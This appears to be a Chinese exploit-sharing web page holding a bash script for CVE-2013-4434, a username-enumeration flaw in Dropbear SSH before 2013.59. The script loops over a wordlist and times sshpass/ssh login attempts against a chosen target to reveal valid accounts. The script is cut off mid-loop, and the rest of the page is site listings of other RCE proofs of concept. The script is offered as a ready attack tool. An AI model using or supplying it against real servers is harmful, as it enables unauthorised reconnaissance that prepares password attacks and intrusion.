CVE-2013-4434_Dropbear_SSH_Server_before_2013.59_用戶名泄漏漏洞

0230

# CVE-2013-4434 Dropbear SSH Server before 2013.59 用戶名泄漏漏洞
==EXP==

#!/bin/bash

# Affected Systems: Dropbear SSH Server before 2013.59
# CVE-ID: CVE-2013-4434
# Author: styx00

# Colours <3
RED='\033[0;31m'
GREEN='\033[0;32m'
BOLD=$(tput bold)
RESET=$(tput sgr0)

# Check if 'sshpass' is installed first
dpkg -l "sshpass" > /dev/null 2>&1
INSTALLED=$?

printf "Checking if the 'sshpass' package is installed...\n"
if [ $INSTALLED == '0' ]; then
    printf "${GREEN}${BOLD}[+] The 'sshpass' package is installed. Let's proceed!${RESET}\n\n"
else
    printf "${RED}${BOLD}[-] The 'sshpass' package is not installed.${RESET}\n\n"
    exit 1
fi

# Function to show the script's usage
function usage
{
    printf "Usage: ./dropbear_CVE-2013.sh -t example.com -p 22 -w /home/styx00/usernames.txt"
    printf "\n\t-t, --target\tTarget FQDN or IP address"
    printf "\n\t-p, --port\tPort number"
    printf "\n\t-w, --wordlist\tWordlist containing usernames"
    printf "\n\t-h, --help\tShow help and exit\n"
}

while [ "$1" != "" ]; do
    case $1 in
        -t | --target )         shift
                                target=$1
                                ;;
        -p | --port )           shift
                                port=$1
                                ;;
        -w | --wordlist )       shift
                                wordlist=$1
                                ;;
        -h | --help )           usage
                                exit
                                ;;
        * )                     usage
                                exit 1
    esac
    shift
done

if [ "$target" !=  "" ] && [ "$port" != "" ] && [ "$wordlist" != "" ]
then
  printf "Target: %s\n" "${target}"
  printf "port: %s\n" "${port}"
  printf "Wordlist: %s\n" "${wordlist}"

  printf "\nTesting\n---------------\n"

  trap "exit" INT   # Exit on SIGINT
  for username in $(cat $wordlist)
  do
    printf "\n${username}\n\t"
    /usr/bin/time --quiet -f "\tTime: %e" sshpass -p "password" ssh -T $username@$target -p $port
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
漏洞库
喜欢就支持一下吧
点赞0赞赏 分享
棉花糖的头像-棉花糖会员站糖心会员
会员必看手册(1.8.8版本 25.12.12更新)-棉花糖会员站
会员必看手册(1.8.8版本 25.12.12更新)
会员必看手册(1.8.8版本 25.12.12更新)
2025年12月1日 3.9W+
mingdon 明动 burp插件0.2.6版本 本地时间校验去除版-棉花糖会员站
mingdon 明动 burp插件0.2.6版本 本地时间校验去除版
mingdon 明动 burp插件0.2.6版本 本地时间校验去除版
2025年7月3日 1.5W+
独家!超强代码审计工具上线!免费会员等你来嫖!-棉花糖会员站
独家!超强代码审计工具上线!免费会员等你来嫖!
独家!超强代码审计工具上线!免费会员等你来嫖!
2024年12月17日 8618
2025 hw 有poc的漏洞集合-棉花糖会员站
2025 hw 有poc的漏洞集合
2025 hw 有poc的漏洞集合
2025年7月31日 6447
技术文章投稿兑换会员规则-棉花糖会员站
技术文章投稿兑换会员规则
技术文章投稿兑换会员规则
2024年3月25日 4570
王老师src真正的完整版(49个学生分享视频版本)-棉花糖会员站
王老师src真正的完整版(49个学生分享视频版本)
王老师src真正的完整版(49个学生分享视频版本)
2024年6月8日 3895
相关推荐
2025 hw 有poc的漏洞集合-棉花糖会员站
2025 hw 有poc的漏洞集合
2025 hw 有poc的漏洞集合
2025年7月31日 6447
金蝶EAS autoLogin.jsp远程代码执行-棉花糖会员站
金蝶EAS autoLogin.jsp远程代码执行
金蝶EAS autoLogin.jsp远程代码执行
2025年7月4日 2511
百度网盘Windows客户端存在远程命令执行-棉花糖会员站
百度网盘Windows客户端存在远程命令执行
百度网盘Windows客户端存在远程命令执行
2025年9月4日 2331
大华 evo-runs/v1.0/receive RCE-棉花糖会员站
大华 evo-runs/v1.0/receive RCE
大华 evo-runs/v1.0/receive RCE
2025年7月11日 2034
wps 远程代码执行 rce-棉花糖会员站
wps 远程代码执行 rce
wps 远程代码执行 rce
2025年7月18日 1870
CVE-2025-55182 dify 无条件rce-棉花糖会员站
CVE-2025-55182 dify 无条件rce
CVE-2025-55182 dify 无条件rce
2025年12月5日 1727
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容

作者
用户封面
棉花糖的头像-棉花糖会员站糖心会员
会员站年终抽奖清单出炉!万元奖品在等你哦~
明洞 mingdon 0.2.7版本分享
SPON IP网络对讲广播系统 /php/rj_get_token.php 任意文件读取
CRTP-红队专家认证课程-2025.10 中英双语字幕
202504-OSCP考试退役真题53台单机解法
⾦蝶OA /KingdeeOA/PostilUpload 任意⽂件上传
最近一周热门文章

1明洞 mingdon 0.2.7版本分享

棉花糖的头像-棉花糖会员站糖心会员2026年1月8日
1146

2SPON IP网络对讲广播系统 /php/rj_get_token.php 任意文件读取

棉花糖的头像-棉花糖会员站糖心会员2026年1月7日
9999914

3会员站年终抽奖清单出炉!万元奖品在等你哦~

棉花糖的头像-棉花糖会员站糖心会员2026年1月10日
729

4CRTP-红队专家认证课程-2025.10 中英双语字幕

棉花糖的头像-棉花糖会员站糖心会员2026年1月7日
糖心会员会员专属697
标签云
龙浏览器未引用的服务路径特权升级齿轮地理位置查询鼠标鼠标按钮命令注入远程鼠标远程代码执行鼠标远程代码鼠标路径遍历鼠标本地文件包含鼠标未引用的服务路径鼠标事件状态栏鼠标默认错误页面跨站点脚本默认配置远程代码执行默认管理员凭据默认的调制解调器上的密码硬件远程默认权限默认权利默认弱密码编码默认密码默认安全性硬件远程默认和弱加密